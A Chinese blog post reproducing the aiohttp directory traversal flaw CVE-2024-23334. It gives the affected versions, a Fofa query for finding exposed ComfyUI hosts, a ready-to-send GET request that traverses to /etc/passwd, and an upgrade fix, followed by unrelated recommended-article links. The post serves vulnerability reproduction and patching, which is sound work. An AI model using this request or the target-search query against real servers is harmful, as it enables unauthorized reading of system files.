Aiohttp 目录遍历漏洞(CVE-2024-23334)

已于 2024-09-02 10:33:26 修改
阅读量144 收藏
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全
于 2024-09-02 10:14:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141812739
版权

0x01 漏洞描述:

aiohttp 是一个用于 asyncio 和 Python 的异步 HTTP 客户端/服务器框架。使用aiohttp作为Web服务器并配置静态路由时,需要指定静态文件的根路径。使用aiohttp实现的Web服务在 配置aiohttp中的静态资源解析时使用了不安全的参数follow_symlinks,代码如routes.static("/static", static_dir, follow_symlinks=True) 成功利用该漏洞可读取服务器上任意文件

0x02 影响版本:

1.0.5 < version < 3.9.2

0x03 搜索语句:

Fofa:title=="ComfyUI"

0x04 漏洞复现:

GET /static/../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

0x05 修复建议:

官方已在3.9.2及以上版本中修复此漏洞

iSee857
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
深信服的CVE-2024-38077检测工具
08-10
这个工具是来自于深信服的检测工具
Apache Flink目录遍历(CVE-2020-17519)批量检测脚本
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
Apache Flink目录遍历(CVE-2020-17519)单目标检测工具
09-24
2021年1月5日,Apache Flink官方发布安全更新,修复了由蚂蚁安全非攻实验室发现提交的2个高危漏洞漏洞之一就是Apache Flink目录遍历漏洞(CVE-2020-17519)。 Flink核心是一个流式的数据流执行引擎,其针对数据流的...
深信服CVE-2024-38077漏洞扫描工具
08-14
深信服CVE-2024-38077漏洞扫描工具,包含使用手册和修复方案
CVE-2024-38077漏洞检测工具
08-15
检测某个ip地址是否存在CVE-2024-38077漏洞,Windows 远程桌面授权服务远程代码执行漏洞。 使用方法:test.exe 192.168.1.2,扫描IP地址为192.168.1.2机器是否存在漏洞
k8s安全
ljj19910401的博客
08-29 755
Kubernetes(k8s)的安全机制是围绕保护其API Server来设计的,主要包括认证(Authentication)、鉴权(Authorization)和准入控制(Admission Control)三个核心环节。
危化品如何在室外安全暂存
SAVEST的博客
08-29 876
危化品是指具有毒害、腐蚀、爆炸、燃烧、助燃等性质,对人体、设施、环境具有危害的剧毒化学品和其他化学品。在生产、使用、储存和运输过程中,危化品都需要严格的安全措施和合规操作。室外暂存是指将危化品在室外指定区域进行短期储存,以便后续处理或转运。这种存储方式在危化品管理中具有重要意义,但在实践中也面临着安全管理和效率的挑战。
加密与安全_前后端通过AES-CBC模式安全传输数据
小工匠
08-30 1786
当我们在前端和后端之间传输敏感信息时,安全性变得越来越重要。今天,我们将一起探索如何在前端加密密码,并在后端安全解密的过程。使用Vue.js作为前端框架,并通过Java来处理后端解密。通过动态生成密钥和初始向量,并使用安全的密钥管理服务,我们可以大幅提升系统的安全性。这不仅能防止密钥泄露带来的风险,还能通过安全的密钥交换和管理,确保前后端通信的绝对安全。在实际的生产环境中,密钥的管理和轮换至关重要,建议使用专业的KMS来简化并加强密钥管理工作。通过这些措施,可以构建一个更加安全和稳健的系统。
【国铁采购平台-注册安全分析报告-无验证方式导致安全隐患】
08-31 815
国铁采购平台电子招标采购系统”是中国国家铁路集团有限公司及所属企业指定的电子招标采购系统,运用大数据、云计算、互联网和人工智能技术,提高采购电子化水平,加强采购大数据分析,实现智慧采购和智能管理。,从平台的实力来看应该是非常雄厚,但好像对短信被盗刷的安全方面不够重视 ,测试结果就是随便你怎么攻击都可以,这也有点太开放了, 短信验证码难道不要钱吗?这对黑客来说肯定是好消息, 弄个简单的脚本就可以搞定很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“
23. 如何使用Collections.synchronizedList()方法来创建线程安全的集合?有哪些注意事项?
zhzjn的博客
08-31 629
复合操作是指多个操作组成的逻辑单元,如遍历集合和修改集合的操作结合在一起时。是在写操作时创建集合的副本,而读操作可以无锁进行,因此在读多写少的场景中具有较好的性能。在多线程环境下,选择合适的集合类型和同步机制至关重要,这取决于应用的具体需求和并发程度。确保了对单个方法调用的线程安全性,但在某些复合操作中(如遍历集合),仍然需要进行。如果在实际应用中存在大量并发读操作,而写操作较少,可以考虑使用其他并发集合类,如。,这些类提供了更细粒度的锁和更高效的并发处理机制,通常在高并发场景下表现更好。
架构设计(13)安全架构设计理论
追赶时代的博客
09-01 828
信息安全的架构设计,比如网络安全设计,数据库安全设计
安全入门day.04
最新发布
mxxcxy的博客
09-01 610
MD5加密是一种广泛使用的密码杂凑函数,它可以将任意长度的信息通过一系列复杂的数学和位操作转化为一个128位(16字节)的散列值(hash value),这个散列值通常被表示为一个32位的十六进制数。MD5加密在信息安全领域有着重要的应用,但需要注意的是,随着计算技术的发展,MD5加密的安全性已经受到挑战,不再适用于需要高安全性的场合。如果仍然需要使用MD5,可以考虑采取一些额外的安全措施来提高其安全性。
等保2.0--安全计算环境--TiDB数据库
m0_60936698的博客
08-31 414
设置该变量时有最小值要求,最小值由其他几个相关的系统变量控制,即该变量的值不能设置为小于此表达式的值:validate_password.number_count+validate_password.special_char_count+(2*validate_password.mixed_case_count),口令的长度不能低于该变量的数值。TiDB是在需要高并发的场景经常见到的数据库,在大型的企业中会经常看到,虽然经常说他长得像MySQL数据库,但事实上其性能还是比较强的。(以上由文心一言生成)
深度解读并发安全集合的原理及源码
DougLiang的博客
09-01 838
本节主要介绍J.U.C包中的几种并发安全集合:ConcurrentHashMap,ConcurrentLinkedQueue,和ConcurrentLinkedDeque。所谓并发安全集合,相对于普通集合来说,能够保证在多线程环境下向集合中添加数据时的线程安全性。主要讲ConcurrentHashMap在实现线程安全性方面对性能和安全性的合理平衡。
“北京地铁系统中人脸识别技术的安全与效率问题研究”
matlabgoodboy的博客
08-28 545
综上所述,北京地铁系统中人脸识别技术的应用在提高安检和售检票效率方面具有显著优势,但同时也面临着数据隐私保护和滥用风险等安全问题。为了充分发挥人脸识别技术的优势并降低其风险,需要建立健全的法律法规和监管机制,并不断优化技术算法和管理手段。
WorkPlus安全即时通讯:端到端加密开启信息保密新时代
weixin_53855915的博客
09-01 613
作为一款拥有端到端加密功能的通讯平台,WorkPlus着重于保护用户的通讯隐私,并开启了一个全新的信息保密时代。最后,企业和个人在选择保密通讯工具时,应仔细评估其信誉和安全性,并采取额外的安全措施,如定期更新和强化设备密码、避免使用不受信任的公共Wi-Fi网络等。安全审计和监控:WorkPlus提供日志审计和监控功能,企业管理员可以对通讯记录进行审计和监控,以进一步确保通讯的合规和安全。即时文本和语音通话:WorkPlus提供安全的即时文本和语音通话功能,通过端到端加密确保通讯内容的保密性。
【BLE】四.SMP安全配对详解
u013115811的博客
09-01 481
Paring(配对):配对能力交换,设备认证,密钥生成,连接加密以及机密信息分发等过程Bonding(绑定)配对中会生成一个长期密钥(LTK,long-term Key),双方把在Flash,那么这两个设备再次重连就可,且直接使用LTK对蓝牙连接进行加密;不存储LTK(不分发LTK),paring完成后连接也是加密的,但重连需再次进行paring流程,否则两者还是明文通信;
SSL证书如何保护IP地址的安全
alsknv的博客
08-28 448
这样,客户端与CDN之间的通信是加密的,而CDN与源服务器之间的通信则可以在内部网络中进行,从而避免源服务器IP地址的直接暴露。这意味着,当数据通过IP地址在客户端和服务器之间传输时,SSL证书能够确保这些数据被加密,从而防止第三方在传输过程中截取和篡改数据。通过HTTPS连接,客户端和服务器之间的所有通信都被加密,即使数据被截获,也无法被未授权的第三方轻易解密。综上所述,SSL证书通过数据加密、建立安全连接、身份验证、增强用户信任以及与其他安全措施结合使用等方式来保护IP地址的安全
无人机反制:低空安全综合管理平台技术详解
专注多旋翼、复合翼无人机技术研究,从事低空经济行业。
09-01 385
3. 精准反制与打击:在确认目标为非法或违规无人机后,平台可迅速启动反制模块,通过发射特定频率的电磁干扰信号或激光束等手段,干扰无人机的控制系统或通信链路,迫使其失去控制或降落;无人机反制技术中的低空安全综合管理平台,作为守护低空安全的重要工具,集成了多种先进的技术手段和管理功能,实现了对无人机等低空飞行器的全方位、无死角监控与反制。综上所述,低空安全综合管理平台作为无人机反制技术的重要组成部分,以其先进的技术手段、全面的功能特性和高效的管理能力,在保障低空安全方面发挥着至关重要的作用。
详细介绍一下tomcat的目录遍历漏洞CVE-2020-1938)
04-29
Tomcat 目录遍历漏洞CVE-2020-1938)是一种文件包含漏洞,影响 Apache Tomcat 服务器的 AJP 协议。 AJP 协议(Apache JServ Protocol)是 Apache HTTP Server 与 Tomcat 之间通信的一种协议,可以通过 mod_jk、mod_proxy_ajp 或 mod_cluster 等模块使用。攻击者可以通过发送恶意请求,利用该漏洞读取远程服务器上的任意文件,包括敏感配置文件、源代码等。 漏洞的原理是,攻击者在请求中添加特殊的 AJP 协议数据包,伪装成合法的请求,欺骗 Tomcat 服务器将任意文件作为响应返回。 该漏洞影响 Apache Tomcat 9.0.0.M1 到 9.0.31、8.5.0 到 8.5.51、7.0.0 到 7.0.100 版本,已经被评为“高危”漏洞。 为了修复该漏洞,可以升级到 Tomcat 9.0.32、8.5.52 或 7.0.100 以上版本。如果不能立即升级,也可以在 AJP 协议前面添加一个安全网关(如 Web 服务器或反向代理服务器),或者关闭 AJP 协议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值